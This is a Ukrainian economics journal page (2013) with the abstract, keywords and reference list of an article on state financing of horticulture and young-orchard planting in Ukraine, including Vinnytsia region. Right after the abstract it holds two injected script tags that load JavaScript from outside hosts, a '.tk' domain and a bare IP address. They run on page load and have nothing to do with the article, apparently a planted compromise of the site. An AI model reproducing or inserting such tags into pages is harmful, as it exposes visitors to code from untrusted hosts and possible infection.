ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 338.434:634
Сторінка молодого науковця

Особливості державного фінансування галузі садівництва / Тупчій О. С. // Економіка АПК. - 2013. - № 10 - С. 116

Розглянуто проблеми інвестиційного розвитку галузі садівництва в умовах ринкових перетворень. Висвітлено сучасний стан державної підтримки садівницьких підприємств України, зокрема Вінницької області, визначено особливості та оцінено вплив державного фінансування на закладення молодих садів. Здійснено пошук і наукове обґрунтування напрямів удосконалення державної підтримки галузі садівництва з урахуванням особливостей аграрного сьогодення, а саме: вирішення на державному рівні питань щодо збереження 1,5 % збору для підтримки галузі; використання механізмів обліку прозорого їх розподілу та можливість контролю використання коштів; періодичне оцінювання на предмет ефективності; стимулювання розвитку ринкових механізмів і конкуренції; сприяння впровадженню в галузі інтенсивних технологій виробництва плодів та ягід; формування належної виробничої й соціальної інфраструктури; проведення декомпозиції напрямів здешевлення кредитів; розробка ефективних схем підтримки довгострокового кредитування інвестиційних проектів галузі; залучення іноземних інвестицій та жорсткий контроль за їх використанням; створення Департаменту садівництва і виноградарства у складі Міністерства аграрної політики та продовольства України, в якому крім технічних відділів були б підрозділи з планування, експорту й імпорту плодоягідної продукції, а також формування виробничої та ринкової інфраструктур. Табл.: 2. Рис.: 1. Бібліогр.: 20.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: державне фінансування, галузь садівництва, садівничі підприємства, закладання молодих садів, будівництво холодильників, джерела інвестицій

Список використаних джерел

 1. Бородіна О.М. Державна підтримка сільського господарства: концепція, механізми, ефективність / О.М. Бородіна [Електронний ресурс]. – Режим доступу: www.ief.org.ua/Arjiv_EP/Borodina106.pdf‎.
 2. Гайдуцький А. Інвестиційні аспекти вступу до СОТ для аграрних секторів країн Центральної і Східної Європи / А. Гайдуцький // Економіка України. – 2006. – № 7. – С. 83–91.
 3. Гудзь О.Є. Механізми прямої фінансової підтримки сільськогосподарського виробництва. Державна політика фінансової підтримки розвитку аграрного сектору АПК: моногр. / [Дем’яненко М.Я., Саблук П.Т., Скупий В.М. та ін.]; за ред. М.Я. Дем’яненка. – К.: ННЦ ІАЕ, 2011. – 372 с.
 4. Економіка та організація промислового садівництва України / [Шестопаль О.М., Рульєв В.А., Кондратенко П.В. та ін.]; за ред. д-ра екон. наук О.М. Шестопаля; ІС УААН. – К.: ННЦ ІАЕ, 2010. – 334 с.
 5. Єрмаков О.Ю. Методологія економічного дослідження організаційних форм виробництва / О.Ю. Єрмаков // Економіка АПК. – 2003. – № 1. – С. 31-37.
 6. Закон України “Про збір на розвиток виноградарства, садівництва і хмелярства” від 9 квітня 1999 р. № 587 – ХІV // Нормативні акти з фінансів, податків, страхування та бухгалтерського обліку. – 1999. – №12. – С. 8-9.
 7. Закон України «Про збір на розвиток виноградарства, садівництва і хмелярства» від 06.12.2012 р. № 5515-VI (5515-17 ) [Електронний ресурс]. – Режим доступу: zakon.rada.gov.ua/laws/show/587-14.
 8. Збарський В.К. Державна підтримка сільського господарства / В.К. Збарський, В.П. Горьовий // Економіка АПК. – 2010. – № 4. – С. 74-80.
 9. Клименко О. Основні завдання розвитку вітчизняної індустрії страхування / О. Клименко // Страхова справа. – 2008. – № 3 (31). – С. 7-9.
 10. Лузан Ю.Я. Відтворювальні процеси в агропромисловому комплексі України / Ю. Я. Лузан // Економіка АПК. – 2010. – № 5. – С. 39-44.
 11. Месель-Веселяк В.Я. Аграрна реформа і організаційно-економічні трансформації в сільському господарстві / В.Я. Месель-Веселяк // Економіка АПК. – 2010. – № 4. – С. 3-18.
 12. Непочатенко О.О. Теоретичні і практичні аспекти державної підтримки аграрного сектора економіки / О.О. Непочатенко, А.Ф. Головчук // Фінансово-економічні проблеми стабільного розвитку економіки України; під ред. А.Ф. Головчука, О.О. Непочатенко (Ч. 1). – Умань: ВПЦ «Візаві», 2010. – С. 175-183.
 13. Нестерчук Ю.О. Стратегічне управління інтеграційними процесами в АПК / Ю.О. Нестерчук [Електронний ресурс]. – Режим доступу: www.pu.if.ua/depart/Finances/resource/file/Збірник/.../Нестерчук.pdf‎.
 14. Про затвердження нормативів, у межах яких проводиться компенсація у виноградарстві, садівництві і хмелярстві, форм звітності та переліку механізмів і техніки [Електронний ресурс]: наказ Міністерства аграрної політики та продовольства України від 11.12.2012 р. № 759. – Режим доступу: zakon.rada.gov.ua/go/z1114-12.
 15. Тупчій О.С. Основні економічні засади державного регулювання промислового садівництва / О.С. Тупчій // Теоретичні та практичні аспекти розвитку сучасної економіки: Матеріали ХХІ Міжнар. наук.-практ. конф. (Львів, 28-29 груд. 2012 року): у 3-х частинах / Громадська організація «Львівська економічна фундація». – Львів: ЛЕФ, 2012. Ч.3. – С. 34-36.
 16. Brauchen wir alternative Anreizmechanismen in der Agrarpolitik? [Electronic resource]. – Mode of access: http://agrarpolitik-blog.com/2011/09/27/brauchen-wir-alternative anreizmechanismen-in-der-agrarpolitik.
 17. Charnes A. Measuring the efficiency of decision-making units / A. Charnes, W. Cooper, L. Rhodes // European Journal of Operational Research. 2. – 1978. – P. 429-444.
 18. Nut production and industry in Europe, Near East and North Africa: Proceeding of the “Expert Consultation on the Promotion of Nut Production in Europe and Near East Regions”, 19-22 June 1990 / Editorial Board: U.G. Menini, H. Ölez, M. Özelkök // REUR Technical Series. – 1990. – № 411. – 412 р.
 19. Pinson L. Anatomy of a Business Plan / L. Pinson, J. Jinnet. – Chicago: Dearborn, 1999. – 274 p.
 20. Funding Your Community Garden [Electronic resource]. – Mode of access: http://www.communitygardenswa.org.au/media/articles/Resources---Resources-To-Download/Funding-Your-Community-Garden.pdf.
Читати статтю: 13_10_116-122.pdf